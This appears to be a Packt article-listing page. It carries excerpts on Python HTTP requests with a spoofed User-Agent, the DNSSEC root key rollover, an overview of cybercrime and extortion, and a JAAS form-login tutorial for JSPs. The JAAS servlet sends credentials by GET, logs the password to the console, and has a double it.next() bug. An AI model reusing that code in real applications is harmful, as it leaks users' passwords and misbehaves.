the paths in our path_list, we make an HTTP GET request. This is what browsers do to get the image files mentioned in an HTML page. We print a few things from each response. The status, if everything worked, will be 200. If the status is not 200, then something went wrong and we'll need to read up on the HTTP status code to see what happened. If you use a coffee shop Wi-Fi connection, perhaps you're not logged in. You might need to open a browser to set up a connection. An HTTP response includes headers that provide some additional details about the request and response. We've printed the headers because they can be helpful in debugging any problems we might have. One of the most useful headers is ('Content-Type', 'image/jpeg'). This confirms that we really did get an image. We used _, _, filename = path.rpartition("/") to locate the right-most / character in the path. Recall that the partition() method locates the left-most instance. We're using the right-most one here. We assigned the directory information and separator to the variable _. Yes, _ is a legal variable name. It's easy to ignore, which makes it a handy shorthand for we don't care. We kept the filename in the filename variable. We create a nested context for the resulting image file. We can then read the body of the response—a collection of bytes—and write these bytes to the image file. In one quick motion, the file is ours. The HTTP GET request is what underlies much of the WWW. Programs such as curl and wget are expansions of this example. They execute batches of GET requests to locate one or more pages of content. They can do quite a bit more, but this is the essence of extracting data from the WWW. Changing our client information An HTTP GET request includes several headers in addition to the URL. In the previous example, we simply relied on the Python http.client library to supply a suitable set of default headers. There are several reasons why we might want to supply different or additional headers. First, we might want to tweak the User-Agent header to change the kind of browser that we're claiming to be. We might also need to provide cookies for some kinds of interactions. For information on the user agent string, see http://en.wikipedia.org/wiki/User_agent_string#User_agent_identification. This information may be used by the web server to determine if a mobile device or desktop device is being used. We can use something like this: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14 This makes our Python request appear to come from the Safari browser instead of a Python application. We can use something like this to appear to be a different browser on a desktop computer: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:28.0) Gecko/20100101 Firefox/28.0 We can use something like this to appear to be an iPhone instead of a Python application: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53 We make this change by adding headers to the request we're making. The change looks like this: connection.request( "GET", path, headers= { 'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53', }) This will make the web server treat our Python application like it's on an iPhone. This might lead to a more compact page of data than might be provided to a full desktop computer that makes the same request. The header information is a structure with the { key: value, } syntax. It's important that dictionaries are surrounded by {}, the keys and values are separated by :, and each key-value pair is separated by ,. Yes, there's an extra , at the end. This is legal in Python. There are many more HTTP headers we can provide. The User-Agent header is perhaps most important to gather different kinds of intelligence data from web servers. You can refer more book related to this topic on the following links: Python for Secret Agents - Volume II: (https://www.packtpub.com/application-development/python-secret-agents-volume-ii) Expert Python Programming: (https://www.packtpub.com/application-development/expert-python-programming) Raspberry Pi for Secret Agents: (https://www.packtpub.com/hardware-and-creative/raspberry-pi-secret-agents) Resources for Article: Further resources on this subject: Python Libraries[article] Optimization in Python[article] Introduction to Object-Oriented Programming using Python, JavaScript, and C#[article]
Read more
  • 0
  • 0
  • 15858

article-image-redhat-shares-what-to-expect-from-next-weeks-first-ever-dnssec-root-key-rollover
Melisha Dsouza
05 Oct 2018
4 min read
Save for later

RedHat shares what to expect from next week’s first-ever DNSSEC root key rollover

Melisha Dsouza
05 Oct 2018
4 min read
On Thursday, October 11, 2018, at 16:00 UTC, ICANN will change the cryptographic key that is at the center of the DNS security system- what is called  DNSSEC. The current key has been in place since July 15, 2010. This switching of the central security key for DNS is called the "Root Key Signing Key (KSK) Rollover". The above replacement was originally planned a year back. The procedure was previously postponed because of data that suggested that a significant number of resolvers where not ready for the rollover. However, the question is 'Are your systems prepared so that DNS will keep functioning for your networks?' DNSSEC is a system of digital signatures to prevent DNS spoofing. Maintaining an up-to-date KSK is essential to ensuring DNSSEC-validating DNS resolvers continue to function following the rollover. If the KSK isn’t up to date, the DNSSEC-validating DNS resolvers will be unable to resolve any DNS queries. If the switch happens smoothly, users will not notice any visible changes and their systems will work as usual. However, if their DNS resolvers are not ready to use the new key, users may not be able to reach many websites! That being said, there’s good news for those who have been keeping up with recent DNS updates. Since this rollover was delayed for almost a year, most of the DNS resolver software has been shipping for quite some time with the new key. Users who have been up to date with this news will have their systems all set for this change. If not, we’ve got you covered! But first, let’s do a quick background check. As of today, the root zone is still signed by the old KSK with the ID 19036 also called KSK-2010. The new KSK with the ID 20326 was published in the DNS in July 2017 and is called KSK-2017. The KSK-2010 is currently used to sign itself, to sign the Root Zone Signing Key (ZSK) and to sign the new KSK-2017. The rollover only affects the KSK. The ZSK gets updated and replaced more frequently without the need to update the trust anchor inside the resolver. Source: Suse.com You can go ahead and watch ICANN’s short video to understand all about the switch Now that you have understood all about the switch, let’s go through all the checks you need to perform #1 Check if you have the new DNSSEC Root Key installed Users need to ensure they have the new DNSSEC Root key ( KSK-2017) has Key ID 20326. To check this, perform the following: - bind - see /etc/named.root.key - unbound / libunbound - see /var/lib/unbound/root.key - dnsmasq - see /usr/share/dnsmasq/trust-anchors.conf - knot-resolver - see /etc/knot-resolver/root.keys There is no need for them to restart their DNS service unless the server has been running for more than a year and does not support RFC 5011. #2 A Backup plan in case of unexpected problems The RedHat team assures users that there is very less probability of occurrence of DNS issues. Incase they do encounter a problem, they have been advised to restart their DNS server. They can try to use the  dig +dnssec dnskey. If all else fails, they should temporarily switch to a public DNS operator. #3 Check for an incomplete RFC 5011 process When the switch happens, containers or virtual machines that have old configuration files and new software would only have the soon to be removed DNSSEC Root Key. This is logged via RFC 8145 to the root name servers which provides ICANN with the above statistics. The server then updates the key via RFC 5011. But there are possibilities that it shuts down before the 30 day hold timer has been reached. It can also happen that the hold timer is reached and the configuration file cannot be written to or the file could be written to, but the image is destroyed on shutdown/reboot and a restart of the container that does not contain the new key. RedHat believes the switch of this cryptographic key will lead to an improved level of security and trust that users can have online! To know more about this rollover, head to RedHat’s official Blog. What Google, RedHat, Oracle, and others announced at KubeCon + CloudNativeCon 2018 Google, IBM, RedHat and others launch Istio 1.0 service mesh for microservices Red Hat infrastructure migration solution for proprietary and siloed infrastructure  
Read more
  • 0
  • 0
  • 15705

article-image-introduction-cyber-extortion
Packt
19 Jun 2017
21 min read
Save for later

Introduction to Cyber Extortion

Packt
19 Jun 2017
21 min read
In this article by Dhanya Thakkar, the author of the book Preventing Digital Extortion, explains how often we make the mistake of relying on the past for predicting the future, and nowhere is this more relevant than in the sphere of the Internet and smart technology. People, processes, data, and things are tightly and increasingly connected, creating new, intelligent networks unlike anything else we have seen before. The growth is exponential and the consequences are far reaching for individuals, and progressively so for businesses. We are creating the Internet of Things and the Internet of Everything. (For more resources related to this topic, see here.) It has become unimaginable to run a business without using the Internet. It is not only an essential tool for current products and services, but an unfathomable well for innovation and fresh commercial breakthroughs. The transformative revolution is spillinginto the public sector, affecting companies like vanguards and diffusing to consumers, who are in a feedback loop with suppliers, constantly obtaining and demanding new goods. Advanced technologies that apply not only to machine-to-machine communication but also to smart sensors generate complex networks to which theoretically anything that can carry a sensor can be connected. Cloud computing and cloud-based applications provide immense yet affordable storage capacity for people and organizations and facilitate the spread of data in more ways than one. Keeping in mind the Internet’s nature, the physical boundaries of business become blurred, and virtual data protection must incorporate a new characteristic of security: encryption. In the middle of the storm of the IoT, major opportunities arise, and equally so, unprecedented risks lurk. People often think that what they put on the Internet is protected and closed information. It is hardly so. Sending an e-mail is not like sending a letter in a closed envelope. It is more like sending a postcard, where anyone who gets their hands on it can read what's written on it. Along with people who want to utilize the Internet as an open business platform, there are people who want to find ways of circumventing legal practices and misusing the wealth of data on computer networks by unlawfully gaining financial profits, assets, or authority that can be monetized. Being connected is now critical. As cyberspace is growing, so are attempts to violate vulnerable information gaining global scale. This newly discovered business dynamic is under persistent threat of criminals. Cyberspace, cyber crime, and cyber security are perceptibly being found in the same sentence. Cyber crime –under defined and under regulated A massive problem encouraging the perseverance and evolution of cyber crime is the lack of an adequate unanimous definition and the under regulation on a national, regional, and global level. Nothing is criminal unless stipulated by the law. Global law enforcement agencies, academia, and state policies have studied the constant development of the phenomenon since its first appearance in 1989, in the shape of the AIDS Trojan virus transferred from an infected floppy disk. Regardless of the bizarre beginnings, there is nothing entertaining about cybercrime. It is serious. It is dangerous. Significant efforts are made to define cybercrime on a conceptual level in academic research and in national and regional cybersecurity strategies. Still, as the nature of the phenomenon evolves, so must the definition. Research reports are still at a descriptive level, and underreporting is a major issue. On the other hand, businesses are more exposed due to ignorance of the fact that modern-day criminals increasingly rely on the Internet to enhance their criminal operations. Case in point: Aaushi Shah and Srinidhi Ravi from the Asian School of Cyber Laws have created a cybercrime list by compiling a set of 74 distinctive and creativelynamed actions emerging in the last three decades that can be interpreted as cybercrime. These actions target anything from e-mails to smartphones, personal computers, and business intranets: piggybacking, joe jobs, and easter eggs may sound like cartoons, but their true nature resembles a crime thriller. The concept of cybercrime Cyberspace is a giant community made out of connected computer users and data on a global level. As a concept, cybercrime involves any criminal act dealing withcomputers andnetworks, including traditional crimes in which the illegal activities are committed through the use of a computer and the Internet. As businesses become more open and widespread, the boundary between data freedom and restriction becomes more porous. Countless e-shopping transactions are made, hospitals keep record of patient histories, students pass exams, and around-the-clock payments are increasingly processed online. It is no wonder that criminals are relentlessly invading cyberspace trying to find a slipping crack. There are no recognizable border controls on the Internet, but a business that wants to evade harm needs to understand cybercrime's nature and apply means to restrict access to certain information. Instead of identifying it as a single phenomenon, Majid Jar proposes a common denominator approach for all ICT-related criminal activities. In his book Cybercrime and Society, Jar refers to Thomas and Loader’s working concept of cybercrime as follows: “Computer-mediated activities which are either illegal or considered illicit by certain parties and which can be conducted through global electronic network.” Jar elaborates the important distinction of this definition by emphasizing the difference between crime and deviance. Criminal activities are explicitly prohibited by formal regulations and bear sanctions, while deviances breach informal social norms. This is a key note to keep in mind. It encompasses the evolving definition of cybercrime, which keeps transforming after resourceful criminals who constantly think of new ways to gain illegal advantages. Law enforcement agencies on a global level make an essential distinction between two subcategories of cybercrime: Advanced cybercrime or high-tech crime Cyber-enabled crime The first subcategory, according to Interpol, includes newly emerged sophisticated attacks against computer hardware and software. On the other hand, the second category contains traditional crimes in modern clothes,for example crimes against children, such as exposing children to illegal content; financial crimes, such as payment card frauds, money laundering, and counterfeiting currency and security documents; social engineering frauds; and even terrorism. We are much beyond the limited impact of the 1989 cybercrime embryo. Intricate networks are created daily. They present new criminal opportunities, causing greater damage to businesses and individuals, and require a global response. Cybercrime is conceptualized as a service embracing a commercial component.Cybercriminals work as businessmen who look to sell a product or a service to the highest bidder. Critical attributes of cybercrime An abridged version of the cybercrime concept provides answers to three vital questions: Where are criminal activities committed and what technologies are used? What is the reason behind the violation? Who is the perpetrator of the activities? Where and how – realm Cybercrime can be an online, digitally committed, traditional offense. Even if the component of an online, digital, or virtual existence were not included in its nature, it would still have been considered crime in the traditional, real-world sense of the word. In this sense, as the nature of cybercrime advances, so mustthe spearheads of lawenforcement rely on laws written for the non-digital world to solve problems encountered online. Otherwise, the combat becomesstagnant and futile. Why – motivation The prefix "cyber" sometimes creates additional misperception when applied to the digital world. It is critical to differentiate cybercrime from other malevolent acts in the digital world by considering the reasoning behind the action. This is not only imperative for clarification purposes, but also for extending the definition of cybercrime over time to include previously indeterminate activities. Offenders commit a wide range of dishonest acts for selfish motives such as monetary gain, popularity, or gratification. When the intent behind the behavior is misinterpreted, confusion may arise and actions that should not have been classified as cybercrime could be charged with criminal prosecution. Who –the criminal deed component The action must be attributed to a perpetrator. Depending on the source, certain threats can be translated to the criminal domain only or expanded to endanger potential larger targets, representing an attack to national security or a terrorist attack. Undoubtedly, the concept of cybercrime needs additional refinement, and a comprehensive global definition is in progress. Along with global cybercrime initiatives, national regulators are continually working on implementing laws, policies, and strategies to exemplify cybercrime behaviors and thus strengthen combating efforts. Types of common cyber threats In their endeavors to raise cybercrime awareness, the United Kingdom'sNational Crime Agency (NCA) divided common and popular cybercrime activities by affiliating themwith the target under threat. While both individuals and organizations are targets of cyber criminals, it is the business-consumer networks that suffer irreparable damages due to the magnitude of harmful actions. Cybercrime targeting consumers Phishing The term encompasses behavior where illegitimate e-mails are sent to the receiver to collect security information and personal details Webcam manager A webcam manager is an instance of gross violating behavior in which criminals take over a person's webcam File hijacker Criminals hijack files and hold them "hostage" until the victim pays the demanded ransom Keylogging With keylogging, criminals have the means to record what the text behind the keysyou press on your keyboard is Screenshot manager A screenshot manager enables criminals to take screenshots of an individual’s computer screen Ad clicker Annoying but dangerous ad clickers direct victims’ computer to click on a specific harmful link Cybercrime targeting businesses Hacking Hacking is basically unauthorized access to computer data. Hackers inject specialist software with which they try to take administrative control of a computerized network or system. If the attack is successful, the stolen data can be sold on the dark web and compromise people’s integrity and safety by intruding and abusing the privacy of products as well as sensitive personal and business information. Hacking is particularly dangerous when it compromises the operation of systems that manage physical infrastructure, for example, public transportation. Distributed denial of service (DDoS) attacks When an online service is targeted by a DDoS attack, the communication links overflow with data from messages sent simultaneously by botnets. Botnets are a bunch of controlled computers that stop legitimate access to online services for users. The system is unable to provide normal access as it cannot handle the huge volume of incoming traffic. Cybercrime in relation to overall computer crime Many moons have passed since 2001, when the first international treatythat targeted Internet and computer crime—the Budapest Convention on Cybercrime—was adopted. The Convention’s intention was to harmonize national laws, improve investigative techniques, and increase cooperation among nations. It was drafted with the active participation of the Council of Europe's observer states Canada, Japan, South Africa, and the United States and drawn up by the Council of Europe in Strasbourg, France. Brazil and Russia, on the other hand, refused to sign the document on the basis of not being involved in the Convention's preparation. In The Understanding Cybercrime: A Guide to Developing Countries(Gercke, 2011), Marco Gercke makes an excellent final point: “Not all computer-related crimes come under the scope of cybercrime. Cybercrime is a narrower notion than all computer-related crime because it has to include a computer network. On the other hand, computer-related crime in general can also affect stand-alone computer systems.” Although progress has been made, consensus over the definition of cybercrime is not final. Keeping history in mind, a fluid and developing approach must be kept in mind when applying working and legal interpretations. In the end, international noncompliance must be overcome to establish a common and safe ground to tackle persistent threats. Cybercrime localized – what is the risk in your region? Europol’s heat map for the period between 2014 and 2015 reports on the geographical distribution of cybercrime on the basis of the United Nations geoscheme. The data in the report encompassed cyber-dependent crime and cyber-enabled fraud, but it did not include investigations into online child sexual abuse. North and South America Due to its overwhelming presence, it is not a great surprise that the North American region occupies several lead positions concerning cybercrime, both in terms of enabling malicious content and providing residency to victims in the regions that participate in the global cybercrime numbers. The United States hosted between 20% and nearly 40% of the total world's command-and-control servers during 2014. Additionally, the US currently hosts over 45% of the world's phishing domains and is in the pack of world-leading spam producers. Between 16% and 20% percent of all global bots are located in the United States, while almost a third of point-of-sale malware and over 40% of all ransomware incidents were detected there. Twenty EU member states have initiated criminal procedures in which the parties under suspicion were located in the United States. In addition, over 70 percent of the countries located in the Single European Payment Area have been subject to losses from skimmed payment cards because of the distinct way in which the US, under certain circumstances, processes card payments without chip-and-PIN technology. There are instances of cybercrime in South America, but the scope of participation by the southern continent is way smaller than that of its northern neighbor, both in industry reporting and in criminal investigations. Ecuador, Guatemala, Bolivia, Peru, and Brazil are constantly rated high on the malware infection scale, and the situation is not changing, while Argentina and Colombia remain among the top 10 spammer countries. Brazil has a critical role in point-of-sale malware, ATM malware, and skimming devices. Europe The key aspect making Europe a region with excellent cybercrime potential is the fast, modern, and reliable ICT infrastructure. According to The Internet Organised Crime Threat Assessment (IOCTA) 2015, Cybercriminals abuse Western European countries to host malicious content and launch attacks inside and outside the continent. EU countries host approximately 13 percent of the global malicious URLs, out of which Netherlands is the leading country, while Germany, the U.K., and Portugal come second, third, and fourth respectively. Germany, the U.K., the Netherlands, France, and Russia are important hosts for bot C&C infrastructure and phishing domains, while Italy, Germany, the Netherlands, Russia, and Spain are among the top sources of global spam. Scandinavian countries and Finland are famous for having the lowest malware infection rates. France, Germany, Italy, and to some extent the U.K. have the highest malware infection rates and the highest proportion of bots found within the EU. However, the findings are presumably the result of the high population of the aforementioned EU countries. A half of the EU member states identified criminal infrastructure or suspects in the Netherlands, Germany, Russia, or the United Kingdom. One third of the European law enforcement agencies confirmed connections to Austria, Belgium, Bulgaria, the Czech Republic, France, Hungary, Italy, Latvia, Poland, Romania, Spain, or Ukraine. Asia China is the United States' counterpart in Asia in terms of the top position concerning reported threats to Internet security. Fifty percent of the EU member states' investigations on cybercrime include offenders based in China. Moreover, certain authorities quote China as the source of one third of all global network attacks. In the company of India and South Korea, China is third among the top-10 countries hosting botnet C&C infrastructure, and it has one of the highest global malware infection rates. India, Indonesia, Malaysia, Taiwan, and Japan host serious bot numbers, too. Japan takes on a significant part both as a source country and as a victim of cybercrime. Apart from being an abundant spam source, Japan is included in the top three Asian countries where EU law enforcement agencies have identified cybercriminals. On the other hand, Japan, along with South Korea and the Philippines, is the most popular country in the East and Southeast region of Asia where organized crime groups run sextortion campaigns. Vietnam, India, and China are the top Asian countries featuring spamming sources. Alternatively, China and Hong Kong are the most prominent locations for hosting phishing domains. From another point of view, the country code top-level domains (ccTLDs) for Thailand and Pakistan are commonly used in phishing attacks. In this region, most SEPA members reported losses from the use of skimmed cards. In fact, five (Indonesia, Philippines, South Korea, Vietnam, and Malaysia) out of the top six countries are from this region. Africa Africa remains renowned for combined and sophisticated cybercrime practices. Data from the Europol heat map report indicates that the African region holds a ransomware-as-a-service presence equivalent to the one of the European black market. Cybercriminals from Africa make profits from the same products. Nigeria is on the list of the top 10 countries compiled by the EU law enforcement agents featuring identified cybercrime perpetrators and related infrastructure. In addition, four out of the top five top-level domains used for phishing are of African origin: .cf, .za, .ga, and .ml. Australia and Oceania Australia has two critical cybercrime claims on a global level: First, the country is present in several top-10 charts in the cybersecurity industry, including bot populations, ransomware detection, and network attack originators. Second, the country-code top-level domain for the Palau Islands in Micronesia is massively used by Chinese attackers as the TLD with the second highest proportion of domains used for phishing. Cybercrime in numbers Experts agree that the past couple of years have seen digital extortion flourishing. In 2015 and 2016, cybercrime reached epic proportions. Although there is agreement about the serious rise of the threat, putting each ransomware aspect into numbers is a complex issue. Underreporting is not an issue only in academic research but also in practical case scenarios. The threat to businesses around the world is growing, because businesses keep it quiet. The scope of extortion is obscured because companies avoid reporting and pay the ransom in order to settle the issue in a conducive way. As far as this goes for corporations, it is even more relevant for public enterprises or organizations that provide a public service of any kind. Government bodies, hospitals, transportation companies, and educational institutions are increasingly targeted with digital extortion. Cybercriminals estimate that these targets are likely to pay in order to protect drops in reputation and to enable uninterrupted execution of public services. When CEOs and CIOs keep their mouths shut, relying on reported cybercrime numbers can be a tricky question. The real picture is not only what is visible in the media or via professional networking, but also what remains hidden and is dealt with discreetly by the security experts. In the second quarter of 2015, Intel Security reported an increase in ransomware attacks by 58%. Just in the first 3 months of 2016, cybercriminals amassed $209 million from digital extortion. By making businesses and authorities pay the relatively small average ransom amount of $10,000 per incident, extortionists turn out to make smart business moves. Companies are not shaken to the core by this amount. Furthermore, they choose to pay and get back to business as usual, thus eliminating further financial damages that may arise due to being out of business and losing customers. Extortionists understand the nature of ransom payment and what it means for businesses and institutions. As sound entrepreneurs, they know their market. Instead of setting unreasonable skyrocketing prices that may cause major panic and draw severe law enforcement action, they keep it low profile. In this way, they maintain the dark business in flow, moving from one victim to the next and evading legal measures. A peculiar perspective – Cybercrime in absolute and normalized numbers “To get an accurate picture of the security of cyberspace, cybercrime statistics need to be expressed as a proportion of the growing size of the Internet similar to the routine practice of expressing crime as a proportion of a population, i.e., 15 murders per 1,000 people per year.” This statement by Eric Jardine from the Global Commission on Internet Governance (Jardine, 2015) launched a new perspective of cybercrime statistics, one that accounts for the changing nature and size of cyberspace. The approach assumes that viewing cybercrime findings isolated from the rest of the changes in cyberspace provides a distorted view of reality. The report aimed at normalizing crime statistics and thus avoiding negative, realistic cybercrime scenarios that emerge when drawing conclusions from the limited reliability of absolute numbers. In general, there are three ways in which absolute numbers can be misinterpreted: Absolute numbers can negatively distort the real picture, while normalized numbers show whether the situation is getting better Both numbers can show that things are getting better, but normalized numbers will show that the situation is improving more quickly Both numbers can indicate that things are deteriorating, but normalized numbers will indicate that the situation is deteriorating at a slower rate than absolute numbers Additionally, the GCIG (Global Commission on Internet Governance) report includes some excellent reasoning about the nature of empirical research undertaken in the age of the Internet. While almost everyone and anything is connected to the network and data can be easily collected, most of the information is fragmented across numerous private parties. Normally, this entangles the clarity of the findings of cybercrime presence in the digital world. When data is borrowed from multiple resources and missing slots are modified with hypothetical numbers, the end result can be skewed. Keeping in mind this observation, it is crucial to emphasize that the GCIG report measured the size of cyberspace by accounting for eight key aspects: The number of active mobile broadband subscriptions The number of smartphones sold to end users The number of domains and websites The volume of total data flow The volume of mobile data flow The annual number of Google searches The Internet’s contribution to GDP It has been illustrated several times during this introduction that as cyberspace grows, so does cybercrime. To fight the menace, businesses and individuals enhance security measures and put more money into their security budgets. A recent CIGI-Ipsos (Centre for International Governance Innovation - Ipsos) survey collected data from 23,376 Internet users in 24 countries, including Australia, Brazil, Canada, China, Egypt, France, Germany, Great Britain, Hong Kong, India, Indonesia, Italy, Japan, Kenya, Mexico, Nigeria, Pakistan, Poland, South Africa, South Korea, Sweden, Tunisia, Turkey, and the United States. Survey results showed that 64% of users were more concerned about their online privacy compared to the previous year, whereas 78% were concerned about having their banking credentials hacked. Additionally, 77% of users were worried about cyber criminals stealing private images and messages. These perceptions led to behavioral changes: 43% of users started avoiding certain sites and applications, some 39% regularly updated passwords, while about 10% used the Internet less (CIGI-Ipsos, 2014). GCIC report results are indicative of a heterogeneous cyber security picture. Although many cybersecurity aspects are deteriorating over time, there are some that are staying constant, and a surprising number are actually improving. Jardine compares cyberspace security to trends in crime rates in a specific country operationalizing cyber attacks via 13 measures presented in the following table, as seen in Table 2 of Summary Statistics for the Security of Cyberspace(E. Jardine, GCIC Report, p. 6):    Minimum Maximum Mean Standard Deviation New Vulnerabilities 4,814 6,787 5,749 781.880 Malicious Web Domains 29,927 74,000 53,317 13,769.99 Zero-day Vulnerabilities 8 24 14.85714 6.336 New Browser Vulnerabilities 232 891 513 240.570 Mobile Vulnerabilities 115 416 217.35 120.85 Botnets 1,900,000 9,437,536 4,485,843 2,724,254 Web-based Attacks 23,680,646 1,432,660,467 907,597,833 702,817,362 Average per Capita Cost 188 214 202.5 8.893818078 Organizational Cost 5,403,644 7,240,000 6,233,941 753,057 Detection and Escalation Costs 264,280 455,304 372,272 83,331 Response Costs 1,294,702 1,738,761 1,511,804 152,502.2526 Lost Business Costs 3,010,000 4,592,214 3,827,732 782,084 Victim Notification Costs 497,758 565,020 565,020 30,342   While reading the table results, an essential argument must be kept in mind. Statistics for cybercrime costs are not available worldwide. The author worked with the assumption that data about US costs of cybercrime indicate costs on a global level. For obvious reasons, however, this assumption may not be true, and many countries will have had significantly lower costs than the US. To mitigate the assumption's flaws, the author provides comparative levels of those measures. The organizational cost of data breaches in 2013 in the United States was a little less than six million US dollars, while the average number on the global level, which was drawn from the Ponemon Institute’s annual Cost of Data Breach Study (from 2011, 2013, and 2014 via Jardine, p.7) measured the overall cost of data breaches, including the US ones, as US$2,282,095. The conclusion is that US numbers will distort global cost findings by expanding the real costs and will work against the paper's suggestion, which is that normalized numbers paint a rosier picture than the one provided by absolute numbers. Summary In this article, we have covered the birth and concept of cyber crime and the challenges law enforcement, academia, and security professionals face when combating its threatening behavior. We also explored the impact of cyber crime by numbers on varied geographical regions, industries, and devices. Resources for Article:  Further resources on this subject: Interactive Crime Map Using Flask [article] Web Scraping with Python [article]
Read more
  • 0
  • 0
  • 15520
article-image-jaas-based-security-authentication-jsps
Packt
18 Nov 2013
9 min read
Save for later

JAAS-based security authentication on JSPs

Packt
18 Nov 2013
9 min read
(For more resources related to this topic, see here.) The deployment descriptor is the main configuration file of all the web applications. The container first looks out for the deployment descriptor before starting any application. The deployment descriptor is an XML file, web.xml, inside the WEB-INF folder. If you look at the XSD of the web.xml file, you can see the security-related schema. The schema can be accessed using the following URL: http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd. The following is the schema element available in the XSD: <xsd:element name="security-constraint" type="j2ee:securityconstraintType"/> <xsd:element name="login-config" type="j2ee:login-configType"/> <xsd:element name="security-role "type="j2ee:security-roleType"/> Getting ready You will need the following to demonstrate authentication and authorization: JBoss 7 Eclipse Indigo 3.7 Create a dynamic web project and name it Security Demo Create a package, com.servlets Create an XML file in the WebContent folder, jboss-web.xml Create two JSP pages, login.jsp and logoff.jsp How to do it... Perform the following steps to achieve JAAS-based security for JSPs: Edit the login.jsp file with the input fields j_username, j_password, and submit it to SecurityCheckerServlet: <%@ page contentType="text/html; charset=UTF-8" %> <%@ page language="java" %> <html > <HEAD> <TITLE>PACKT Login Form</TITLE> <SCRIPT> function submitForm() { var frm = document. myform; if( frm.j_username.value == "" ) { alert("please enter your username, its empty"); frm.j_username.focus(); return ; } if( frm.j_password.value == "" ) { alert("please enter the password,its empty"); frm.j_password.focus(); return ; } frm.submit(); } </SCRIPT> </HEAD> <BODY> <FORM name="myform" action="SecurityCheckerServlet" METHOD=get> <TABLE width="100%" border="0" cellspacing="0" cellpadding= "1" bgcolor="white"> <TABLE width="100%" border="0" cellspacing= "0" cellpadding="5"> <TR align="center"> <TD align="right" class="Prompt"></TD> <TD align="left"> <INPUT type="text" name="j_username" maxlength=20> </TD> </TR> <TR align="center"> <TD align="right" class="Prompt"> </TD> <TD align="left"> <INPUT type="password" name="j_password" maxlength=20 > <BR> <TR align="center"> <TD align="right" class="Prompt"> </TD> <TD align="left"> <input type="submit" onclick="javascript:submitForm();" value="Login"> </TD> </TR> </TABLE> </FORM> </BODY> </html> The j_username and j_password are the indicators of using form-based authentication. Let's modify the web.xml file to protect all the files that end with .jsp. If you are trying to access any JSP file, you would be given a login form, which in turn calls a SecurityCheckerServlet file to authenticate the user. You can also see role information is displayed. Update the web.xml file as shown in the following code snippet. We have used 2.5 xsd. The following code needs to be placed in between the webapp tag in the web.xml file: <display-name>jaas-jboss</display-name> <welcome-file-list> <welcome-file>index.html</welcome-file> <welcome-file>index.htm</welcome-file> <welcome-file>index.jsp</welcome-file> <welcome-file>default.html</welcome-file> <welcome-file>default.htm</welcome-file> <welcome-file>default.jsp</welcome-file> </welcome-file-list> <security-constraint> <web-resource-collection> <web-resource-name>something</web-resource-name> <description>Declarative security tests</description> <url-pattern>*.jsp</url-pattern> <http-method>HEAD</http-method> <http-method>GET</http-method> <http-method>POST</http-method> <http-method>PUT</http-method> <http-method>DELETE</http-method> </web-resource-collection> <auth-constraint> <role-name>role1</role-name> </auth-constraint> <user-data-constraint> <description>no description</description> <transport-guarantee>NONE</transport-guarantee> </user-data-constraint> </security-constraint> <login-config> <auth-method>FORM</auth-method> <form-login-config> <form-login-page>/login.jsp</form-login-page> <form-error-page>/logoff.jsp</form-error-page> </form-login-config> </login-config> <security-role> <description>some role</description> <role-name>role1</role-name> </security-role> <security-role> <description>packt managers</description> <role-name>manager</role-name> </security-role> <servlet> <description></description> <display-name>SecurityCheckerServlet</display-name> <servlet-name>SecurityCheckerServlet</servlet-name> <servlet-class>com.servlets.SecurityCheckerServlet </servlet-class> </servlet> <servlet-mapping> <servlet-name>SecurityCheckerServlet</servlet-name> <url-pattern>/SecurityCheckerServlet</url-pattern> </servlet-mapping> JAAS Security Checker and Credential Handler: Servlet is a security checker. Since we are using JAAS, the standard framework for authentication, in order to execute the following program you need to import org.jboss.security.SimplePrincipal and org.jboss.security.auth.callback.SecurityAssociationHandle and add all the necessary imports. In the following SecurityCheckerServlet, we are getting the input from the JSP file and passing it to the CallbackHandler. We are then passing the Handler object to the LoginContext class which has the login() method to do the authentication. On successful authentication, it will create Subject and Principal for the user, with user details. We are using iterator interface to iterate the LoginContext object to get the user details retrieved for authentication. In the SecurityCheckerServlet Class: package com.servlets; public class SecurityCheckerServlet extends HttpServlet { private static final long serialVersionUID = 1L; public SecurityCheckerServlet() { super(); } protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { char[] password = null; PrintWriter out=response.getWriter(); try { SecurityAssociationHandler handler = new SecurityAssociationHandler(); SimplePrincipal user = new SimplePrincipal(request.getParameter ("j_username")); password=request.getParameter("j_password"). toCharArray(); handler.setSecurityInfo(user, password); System.out.println("password"+password); CallbackHandler myHandler = new UserCredentialHandler(request.getParameter ("j_username"),request.getParameter ("j_password")); LoginContext lc = new LoginContext("other", handler); lc.login(); Subject subject = lc.getSubject(); Set principals = subject.getPrincipals(); List l=new ArrayList(); Iterator it = lc.getSubject().getPrincipals(). iterator(); while (it.hasNext()) { System.out.println("Authenticated: " + it.next().toString() + "<br>"); out.println("<b><html><body><font color='green'>Authenticated: " + request.getParameter("j_username")+" <br/>"+it.next().toString() + "<br/></font></b></body></html>"); } it = lc.getSubject().getPublicCredentials (Properties.class).iterator(); while (it.hasNext()) System.out.println(it.next().toString()); lc.logout(); } catch (Exception e) { out.println("<b><font color='red'>failed authenticatation.</font>-</b>"+e); } } protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { } } Create the UserCredentialHandler file: package com.servlets; class UserCredentialHandler implements CallbackHandler { private String user, pass; UserCredentialHandler(String user, String pass) { super(); this.user = user; this.pass = pass; } @Override public void handle(Callback[] callbacks) throws IOException, UnsupportedCallbackException { for (int i = 0; i < callbacks.length; i++) { if (callbacks[i] instanceof NameCallback) { NameCallback nc = (NameCallback) callbacks[i]; nc.setName(user); } else if (callbacks[i] instanceof PasswordCallback) { PasswordCallback pc = (PasswordCallback) callbacks[i]; pc.setPassword(pass.toCharArray()); } else { throw new UnsupportedCallbackException (callbacks[i], "Unrecognized Callback"); } } } } In the jboss-web.xml file: <?xml version="1.0" encoding="UTF-8"?> <jboss-web> <security-domain>java:/jaas/other</security-domain> </jboss-web> Other is the name of the application policy defined in the login-config.xml file. All these will be packed in as a .war file. Configuring the JBoss Application Server. 